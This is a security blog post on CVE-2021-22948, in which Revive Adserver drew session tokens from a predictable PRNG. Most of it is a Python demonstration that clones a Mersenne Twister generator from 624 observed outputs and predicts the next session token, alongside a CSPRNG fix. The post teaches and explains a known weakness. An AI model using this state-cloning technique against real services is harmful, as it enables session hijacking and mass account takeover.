This blog is all about Cyber Security and IT

Thursday, July 25, 2024

Use of a Broken or Risky Cryptographic Algorithm


Revive Adserver used an ordinary pseudo-random number generator (PRNG) to generate session tokens. The output of such a generator is predictable: an attacker who learns its seed, or who observes enough of its output, can reproduce the generator's state and compute the session tokens it hands out to other users, and so take over their accounts.

The PRNG function involved does not generate cryptographically secure values and must not be used for cryptographic purposes or for anything that has to be unguessable, which is exactly what a session token has to be. PHP's own documentation carries this warning on its non-cryptographic PRNG functions; session tokens belong to a cryptographically secure source such as random_bytes().

CVE-2021-22948
Reference: HackerOne report https://hackerone.com/reports/1306942

Impact

This vulnerability allows mass account takeover: an attacker who can predict the PRNG's output can generate other users' session tokens without knowing their credentials.
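To make the "predictable output" point concrete, here is an added Python demonstration. It is not code from Revive Adserver or from the HackerOne report. It models a server that builds 128-bit session tokens from Python's random module (MT19937, the same Mersenne Twister family behind PHP's mt_rand()), lets an attacker who has seen 624 consecutive 32-bit outputs (156 tokens, e.g. from repeatedly logging in) reverse the output tempering and clone the generator, and then predicts the very next token the server will issue. The token format, the seed, and the assumption that the attacker's captured tokens start at the generator's first output after seeding (the simplest, block-aligned case) are choices made for this example; secure_token() shows the fix with a CSPRNG.

```python
"""Why a non-cryptographic PRNG must not issue session tokens (added example)."""
import random
import secrets

N = 624               # MT19937 state size in 32-bit words
MASK32 = 0xFFFFFFFF
WORDS_PER_TOKEN = 4   # assumed token format: four 32-bit outputs -> 32 hex chars


class WeakTokenIssuer:
    """Models the vulnerable pattern: session tokens drawn from a seeded PRNG."""

    def __init__(self, seed):
        self._rng = random.Random(seed)   # MT19937; seed value is an assumption

    def new_token(self):
        words = [self._rng.getrandbits(32) for _ in range(WORDS_PER_TOKEN)]
        return "".join(f"{w:08x}" for w in words)


def secure_token():
    """The fix: a 128-bit token from the OS CSPRNG, not predictable from past output."""
    return secrets.token_hex(16)


def _undo_right_xor(y, shift):
    # Inverts y ^= y >> shift; each pass fixes the next `shift` bits from the top.
    x = y
    for _ in range(32 // shift + 1):
        x = y ^ (x >> shift)
    return x


def _undo_left_xor(y, shift, mask):
    # Inverts y ^= (y << shift) & mask; each pass fixes the next `shift` bits from the bottom.
    x = y
    for _ in range(32 // shift + 1):
        x = y ^ ((x << shift) & mask)
    return x & MASK32


def untemper(y):
    """Reverse MT19937's output tempering to recover the raw internal state word."""
    y = _undo_right_xor(y, 18)
    y = _undo_left_xor(y, 15, 0xEFC60000)
    y = _undo_left_xor(y, 7, 0x9D2C5680)
    y = _undo_right_xor(y, 11)
    return y


def clone_from_tokens(tokens):
    """Rebuild the issuer's generator from 624 consecutive observed 32-bit outputs.

    Assumes the captured outputs start at the generator's first output after
    seeding, so they form exactly one MT19937 state block.
    """
    words = [int(t[i:i + 8], 16) for t in tokens for i in range(0, len(t), 8)]
    if len(words) != N:
        raise ValueError(f"need exactly {N} outputs, got {len(words)}")
    # Index N tells the clone its block is exhausted, so the next call twists
    # the state exactly as the victim's generator will.
    state = tuple(untemper(w) for w in words) + (N,)
    clone = random.Random()
    clone.setstate((3, state, None))
    return clone


def predict_next_token(clone):
    words = [clone.getrandbits(32) for _ in range(WORDS_PER_TOKEN)]
    return "".join(f"{w:08x}" for w in words)


def demo(seed=0xC0FFEE):
    """Returns (predicted, actual) for the first token issued after the attacker's window."""
    issuer = WeakTokenIssuer(seed)
    observed = [issuer.new_token() for _ in range(N // WORDS_PER_TOKEN)]   # 156 tokens
    clone = clone_from_tokens(observed)
    predicted = predict_next_token(clone)
    actual = issuer.new_token()   # the next victim's session token
    return predicted, actual


if __name__ == "__main__":
    predicted, actual = demo()
    print("predicted:", predicted)
    print("actual:   ", actual)
    print("match:    ", predicted == actual)
    print("secure:   ", secure_token())
```

The attacker needs no knowledge of the seed: 624 outputs are enough to reconstruct the whole state, and every later token follows deterministically. A CSPRNG-backed token (secrets.token_hex here, random_bytes() in PHP) gives the attacker nothing to extrapolate from, which is the property a session token needs.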
